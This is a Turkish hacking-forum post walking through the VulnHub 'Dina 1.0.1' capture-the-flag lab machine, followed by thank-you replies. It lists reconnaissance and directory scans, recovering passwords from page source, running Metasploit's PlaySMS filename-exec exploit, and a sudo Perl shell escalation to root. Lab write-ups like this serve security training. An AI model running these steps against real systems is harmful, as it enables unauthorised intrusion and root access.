Dina 1.0.1 Açıklı Makine Çözümü // ch_arli41

ch_arli41

Özel Üye
9 Tem 2009
1,036
18
Merhaba arkadaşlar.
Bu konumda sizlere Dina 1.0.1 açıklı makine’nin çözümünü anlatacağım. Bu makinemizde hedefimiz root flag (bayrak) olacaktır. Sistemde bir tane flag (bayrak) var onu bulmamız isteniyor.


Dina:1.0.1 Makinesini Aşağıdaki Linkten İndirebilirsiniz:


https://www.vulnhub.com/entry/dina-101,200/#

Sistem kurulumunu ve ayarları yapmak için burdaki konuyu inceleye bilirsiniz.

https://www.turkhackteam.org/siber-...ulnupload-acikli-makine-cozumu-ch_arli41.html

8l9RMQ.png


Kod:
netdiscover

Bu komut bize modeme bağlı cihazları listeliyor. Oradan ip’yi kopyalıyoruz.

tgVAXb.png


Kod:
nmap -sV ipadresi

Bu komut ile portlara bakıyoruz.80 portunu gösteriyor bize bu port açık olduğu için tarayıcımıza direk ip adresini yazıyoruz.

7AMXzv.png

Karşımıza web sitesi çıktı.Sıradaki hedefimiz admin paneli ve giriş bilgileri.

a5FbOb.png

bMMdh1.png

LGIYeo.png


Kod:
dirb [url]http://ipadresi[/url]

Bu komut ile web sitesinin alt dizin taramasını yapıyoruz.Resimdeki gibi önemli olan yerleri not ediyoruz.

63Nr1B.png

Tarayıcıma ipadresi/robots.txt olarak yazıyorum.Buradakilerin hepsini tek tek deniyorum.

DCguh9.png

dpWhiz.png

Burada NOT FOUND yazıyor. Dikkatimi çekti acaba niye bu yazıyı yazdı diye.Sayfa’da maus ile sağ tıklayıp öğeyi denetle diyorum.Gördüğünüz gibi kullanmış olduğu şifrelere ulaştım.Yola devam ediyoruz...

ahubpF.png

ipadresi/secure/ olarak tarayıcıma yazıyorum ve karşıma backup dosyası çıktı.Dosyayı indiriyoruz.

IXpquF.png

Backup dosyasını açtığımızda bizden şifre istiyor. Yukarıda demin aldığımız şifreleri deniyoruz.Şifremizi bulduk freedom.

IUJ6TO.png

Bu seferde bir mp3 dosyası çıktı karşımıza.Hedefimize ulaşmak için çalışmamıza devam ediyoruz...

EkYKMV.png

ANbGDp.png


Kod:
lees dosyaismi.mp3

Bu komut ile mp3 dosyasının içindekileri ekrana yansıtıyoruz. Admin panel linkini ve user ismini bulduk şifre ise demin bulduğumuz listedekileri kullanacağız.

Uo3dUS.png

9z8Jv8.png

Admin panelinden giriş yaptık detayli incelediğimde burda flag(bayrak) olmadığını farkettim.Playsms olarak m.e.t.a.sploit de exploit aratıyoruz.

P2qTQP.png

3iyukb.png


Kod:
search playsms

Evet exploiti bulduk devam ediyoruz.

RRPthZ.png


Kod:
use exploit/multi/http/playsms_filename_exec

Bu komut ile exploit'e giriş yapıyoruz.

1f27FH.png

aXuSbD.png

Yukarıdaki resimdeki gibi gerekli bilgileri dolduruyoruz.

dUzlW8.png


Kod:
python -c 'import pty; pty.spawn("/bin/bash") '
sudo perl -e "exec' /bin/bash"
cd ..
cd ..
ls -l

Yukarıdaki komutları yazıyoruz.

3aRtl5.png

cd root komutu ile root dizinine geçiyoruz.cat flag.txt komutu ile flag.txt dosyasının içindekilerini ekrana yansıtıyoruz.

Resimde gördüğünüz gibi flag(bayrak) bulduk.Bu makinemizinde sonuna geldik. Kendinizi geliştirmek için bu tür makineleri çözmenizi tavsiye ederim. Kolay gelsin. İyi formlar.
 
Son düzenleme:

FAYDAS1Z

Üye
9 Ara 2017
127
0
ÖTÜKEN
Hocam eline sağlık gerçekten güzel anlatmışsın. Vulnhub çok yararlı bir site pentest ile uğraşanlar için haftada bir zaafiyetli makina çözmeye çalışıyorum herkese tavsiyemdir. Başlangıç olarak hiero 1.8 veya mrrobot makinasından başlayabilirsiniz.
 

ch_arli41

Özel Üye
9 Tem 2009
1,036
18
Eline emeğine sağlık.

Ellerinize Sağlık Hocam.

Ellerine emeğine sağlık vaktim olunca okuyacağım emek olduğunu anladım

Eline Sağlık Reis :)

Elinize sağlık.

Hocam eline sağlık gerçekten güzel anlatmışsın. Vulnhub çok yararlı bir site pentest ile uğraşanlar için haftada bir zaafiyetli makina çözmeye çalışıyorum herkese tavsiyemdir. Başlangıç olarak hiero 1.8 veya mrrobot makinasından başlayabilirsiniz.


Çok güzel konu olmuş :):

Eline sağlık abi çok güzel anlatım olmuş

Eline sağlık abi


Herkeze çok teşekkür ederim.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.